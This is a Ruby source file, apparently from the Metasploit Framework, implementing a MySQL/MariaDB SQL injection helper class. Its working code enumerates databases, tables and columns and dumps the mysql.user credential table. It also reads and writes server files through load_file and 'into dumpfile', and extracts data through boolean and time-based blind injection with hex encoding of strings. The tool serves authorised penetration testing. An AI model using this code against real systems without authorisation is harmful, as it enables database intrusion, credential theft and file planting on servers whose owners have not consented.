require 'base64'

#
# This class represents a MySQL/MariaDB Injection object, its primary purpose is to provide the common SQL queries
# needed when performing SQL injection.
# This class should not be instantiated directly, refer to Msf::Exploit::SQLi#create_sqli.
#
module Msf::Exploit::SQLi::MySQLi
  class Common < Msf::Exploit::SQLi::Common
    #
    # Encoders supported by MySQL/MariaDB
    # Keys are MySQL/MariaDB function names, values are decoding procs in Ruby
    #
    ENCODERS = {
      base64: {
        encode: 'replace(to_base64(^DATA^), \'\\n\', \'\')',
        decode: proc { |data| Base64.decode64(data) }
      },
      hex: {
        encode: 'hex(^DATA^)',
        decode: proc { |data| Rex::Text.hex_to_raw(data) }
      }
    }.freeze

    #
    #   See SQLi::Common#initialize
    #
    def initialize(datastore, framework, user_output, opts = {}, &query_proc)
      if opts[:encoder].is_a?(String) || opts[:encoder].is_a?(Symbol)
        # if it's a String or a Symbol, use a predefined encoder if it exists
        opts[:encoder] = opts[:encoder].downcase.intern
        opts[:encoder] = ENCODERS[opts[:encoder]] if ENCODERS[opts[:encoder]]
      end
      super
    end

    #
    #   Query the MySQL/MariaDB version
    #   @return [String] The MySQL/MariaDB version in use
    #
    def version
      call_function('version()')
    end

    #
    #   Query the current database name
    #   @return [String] The name of the current database
    #
    def current_database
      call_function('database()')
    end

    #
    #   Query the current user
    #   @return [String] The username of the current user
    #
    def current_user
      call_function('user()')
    end

    #
    #   Query the names of all the existing databases
    #   @return [Array] An array of Strings, the database names
    #
    def enum_database_names
      dump_table_fields('information_schema.schemata', %w[schema_name]).flatten
    end

    #
    #   Query the character encoding of the given database
    #   @param database [String] the name of a database, or a function call, defaults to the current database
    #   @return [String] The character encoding of the chosen database
    #
    def enum_database_encoding(database = 'database()')
      dump_table_fields('information_schema.schemata', %w[DEFAULT_CHARACTER_SET_NAME],
                        "SCHEMA_NAME=#{database.include?('(') ? database : "'" + database + "'"}").flatten[0]
    end

    #
    #   Query the names of the tables in a given database
    #   @param database [String] the name of a database, or a function call, defaults to the current database
    #   @return [Array] An array of Strings, the table names in the given database
    #
    def enum_table_names(database = 'database()')
      dump_table_fields('information_schema.tables', %w[table_name],
                        "table_schema=#{database.include?('(') ? database : "'" + database + "'"}").flatten
    end

    #
    #   Query the names of the views in a given database
    #   @param database [String] the name of a database, or a function call, defaults to the current database
    #   @return [Array] An array of Strings, the view names in the given database
    #
    def enum_view_names(database = 'database()')
      dump_table_fields('information_schema.views', %w[table_name],
                        "table_schema=#{database.include?('(') ? database : "'" + database + "'"}").flatten
    end

    #
    # Query the MySQL/MariaDB users (their username and password), this might require elevated privileges.
    # @return [Array] an array of arrays representing rows, where each row contains two strings, the username and password
    #
    def enum_dbms_users
      # might require elevated privileges
      dump_table_fields('mysql.user', %w[User Password])
    end

    #
    #   Query the column names of the given table in the given database
    #   @param table_name [String] the name of the table of which you want to query the column names, eg: database.table
    #   @return [Array] An array of Strings, the column names in the given table belonging to the given database
    #
    def enum_table_columns(table_name)
      table_schema_condition = ''
      if table_name.include?('.')
        database, table_name = table_name.split('.')
        table_schema_condition = " and table_schema=#{database.include?('(') ? database : "'" + database + "'"}"
      end
      dump_table_fields('information_schema.columns', %w[column_name],
                        "table_name='#{table_name}'#{table_schema_condition}").flatten
    end

    #
    #  Query the given columns of the records of the given table, that satisfy an optional condition
    #  @param table [String]  The name of the table to query
    #  @param columns [Array] The names of the columns to query
    #  @param condition [String] An optional condition, return only the rows satisfying it
    #  @param num_limit [Integer] An optional maximum number of results to return
    #  @return [Array] An array, where each element is an array of strings representing a row of the results
    #
    def dump_table_fields(table, columns, condition = '', num_limit = 0)
      return '' if columns.empty?

      one_column = columns.length == 1
      if one_column
        columns = "ifnull(#{columns.first},'#{@null_replacement}')"
        columns = @encoder[:encode].sub(/\^DATA\^/, columns) if @encoder
      else
        columns = "concat_ws('#{@second_concat_separator}'," + columns.map do |col|
          col = "ifnull(#{col},'#{@null_replacement}')"
          @encoder ? @encoder[:encode].sub(/\^DATA\^/, col) : col
        end.join(',') + ')'
      end
      unless condition.empty?
        condition = ' where ' + condition
      end
      num_limit = num_limit.to_i
      limit = num_limit > 0 ? ' limit ' + num_limit.to_s : ''
      retrieved_data = nil
      if @safe
        # no group_concat, leak one row at a time
        row_count = run_sql("select count(1) from #{table}#{condition}").to_i
        num_limit = row_count if num_limit == 0 || row_count < num_limit
        retrieved_data = num_limit.times.map do |current_row|
          if @truncation_length
            truncated_query("select mid(cast(#{columns} as binary),^OFFSET^,#{@truncation_length}) from " \
            "#{table}#{condition} limit #{current_row},1")
          else
            run_sql("select cast(#{columns} as binary) from #{table}#{condition} limit #{current_row},1")
          end
        end
      else
        # if limit > 0, an alias will be necessary
        if num_limit > 0
          alias1, alias2 = 2.times.map { Rex::Text.rand_text_alpha(rand(2..9)) }
          if @truncation_length
            retrieved_data = truncated_query('select mid(group_concat(' \
            "#{alias1}#{@concat_separator ? " separator '" + @concat_separator + "'" : ''}),"\
            "^OFFSET^,#{@truncation_length}) from (select cast(#{columns} as binary) #{alias1} from #{table}"\
            "#{condition}#{limit}) #{alias2}").split(@concat_separator || ',')
          else
            retrieved_data = run_sql("select group_concat(#{alias1}#{@concat_separator ? " separator '" + @concat_separator + "'" : ''})"\
            " from (select cast(#{columns} as binary) #{alias1} from #{table}#{condition}#{limit}) #{alias2}").split(@concat_separator || ',')
          end
        else
          if @truncation_length
            retrieved_data = truncated_query('select mid(group_concat(' \
            "cast(#{columns} as binary)#{@concat_separator ? " separator '" + @concat_separator + "'" : ''})," \
            "^OFFSET^,#{@truncation_length}) from #{table}#{condition}#{limit}").split(@concat_separator || ',')
          else
            retrieved_data = run_sql("select group_concat(cast(#{columns} as binary)#{@concat_separator ? " separator '" + @concat_separator + "'" : ''})" \
            " from #{table}#{condition}#{limit}").split(@concat_separator || ',')
          end
        end
      end
      retrieved_data.map do |row|
        row = row.split(@second_concat_separator)
        @encoder ? row.map { |x| @encoder[:decode].call(x) } : row
      end
    end

    #
    # Checks if the target is vulnerable (if the SQL injection is working fine), by checking that
    # queries that should return known results return the results we expect from them
    # @return [Boolean] Whether the SQL injection check was successful
    #
    def test_vulnerable
      random_string_len = @truncation_length ? [rand(2..10), @truncation_length].min : rand(2..10)
      random_string = Rex::Text.rand_text_alphanumeric(random_string_len)
      query_string = "'#{random_string}'"
      query_string = @encoder[:encode].sub(/\^DATA\^/, query_string) if @encoder
      output = run_sql("select #{query_string}")
      return false if output.nil?
      (@encoder ? @encoder[:decode].call(output) : output) == random_string
    end

    #
    # Attempt writing data to the file at the given path
    # @param fpath [String] The path of the file to write to
    # @param data [String] The data to write to the given file
    # @return [void]
    #
    def write_to_file(fpath, data)
      raw_run_sql("select '#{data}' into dumpfile '#{fpath}'")
    end

    #
    # Attempt reading from a file on the filesystem, requires having the FILE privilege
    # @param fpath [String] The path of the file to read
    # @param binary [Boolean] Whether the target file is a binary one or not
    # @return [String] The content of the file if reading was successful
    #
    def read_from_file(fpath, binary=false)
      call_function("load_file('#{fpath}')")
    end

    private

    #
    #  Helper method used in cases where the response is truncated.
    #  @param query [String] The SQL query to execute, where ^OFFSET^ will be replaced with an integer offset for querying
    #  @return [String] The query result
    #
    def truncated_query(query)
      result = [ ]
      offset = 1
      loop do
        slice = run_sql(query.sub(/\^OFFSET\^/, offset.to_s))
        offset += @truncation_length # should be same as @truncation_length for most cases
        result << slice
        vprint_status "{SQLi} Truncated output: #{slice} of size #{slice.size}"
        print_warning "The block returned a string larger than the truncation size : #{slice}" if slice.length > @truncation_length
        break if slice.length < @truncation_length
      end
      result.join
    end

    #
    # Checks the options specific to MySQL/MariaDB
    #
    def check_opts(opts)
      unless opts[:encoder].nil? || opts[:encoder].is_a?(Hash) || ENCODERS[opts[:encoder].downcase.intern]
        raise ArgumentError, 'Unsupported encoder'
      end

      super
    end

    #
    # Returns the output of a MySQL function call
    # @param function [String] The function call, function_name(arguments...)
    # @return [String] What the function call returns
    #
    def call_function(function)
      function = @encoder[:encode].sub(/\^DATA\^/, function) if @encoder
      output = nil
      if @truncation_length
        output = truncated_query("select mid(#{function},^OFFSET^,#{@truncation_length})")
      else
        output = run_sql("select #{function}")
      end
      output = @encoder[:decode].call(output) if @encoder
      output
    end

    #
    # Returns the length of the data that query should return, this is used in blind SQL injections
    # @param query [String] The SQL query to execute
    # @param timebased [Boolean] true if it's a time-based query, false if it's boolean-based
    # @return [Integer] The length of the data that query should return
    #
    def blind_detect_length(query, timebased)
      if_function = ''
      sleep_part = ''
      if timebased
        if_function = 'if(' + if_function
        sleep_part += ",sleep(#{datastore['SqliDelay']}),0)"
      end
      i = 0
      output_length = 0
      loop do
        output_bit = !blind_request("#{if_function}length(cast((#{query}) as binary))&#{1 << i}=0#{sleep_part}")
        output_length |= (1 << i) if output_bit
        i += 1
        stop = blind_request("#{if_function}floor(length(cast((#{query}) as binary))/#{1 << i})=0#{sleep_part}")
        break if stop
      end
      output_length
    end

    #
    # Retrieves the output of the given SQL query, this method is used in Blind SQL injections
    # @param query [String] The SQL query the user wants to execute
    # @param length [Integer] The expected length of the output of the result of the SQL query
    # @param known_bits [Integer] a bitmask all the bytes in the output are expected to match
    # @param bits_to_guess [Integer] the number of bits that must be retrieved from each byte of the query output
    # @param timebased [Boolean] true if it's a time-based query, false if it's boolean-based
    # @return [String] The query result
    #
    def blind_dump_data(query, length, known_bits, bits_to_guess, timebased)
      if_function = ''
      sleep_part = ''
      if timebased
        if_function = 'if(' + if_function
        sleep_part += ",sleep(#{datastore['SqliDelay']}),0)"
      end
      output = length.times.map do |j|
        current_character = known_bits
        bits_to_guess.times do |k|
          # the query below: the inner substr returns a character from the result, the outer returns a bit of it
          output_bit = !blind_request("#{if_function}ascii(mid(cast((#{query}) as binary), #{j + 1}, 1))&#{1 << k}=0#{sleep_part}")
          current_character |= (1 << k) if output_bit
        end
        current_character.chr
      end.join
      output
    end

    #
    # Encodes strings in the query string as hexadecimal numbers
    # @param query [String] an SQL query
    # @return [String] The input query, where strings are replaced by hex sequences
    #
    def hex_encode_strings(query)
      # for more encoding capabilities, run code at the beginning of your block
      query.gsub(/''|""/) do
        "repeat(0x#{rand(0..255).to_s(16)},0)"
      end
      .gsub(/'[^']+?'|"[^"]+?"/) do |match|
        '0x' + Rex::Text.to_hex(match[1..-2], '')
      end
           
    end
  end
end
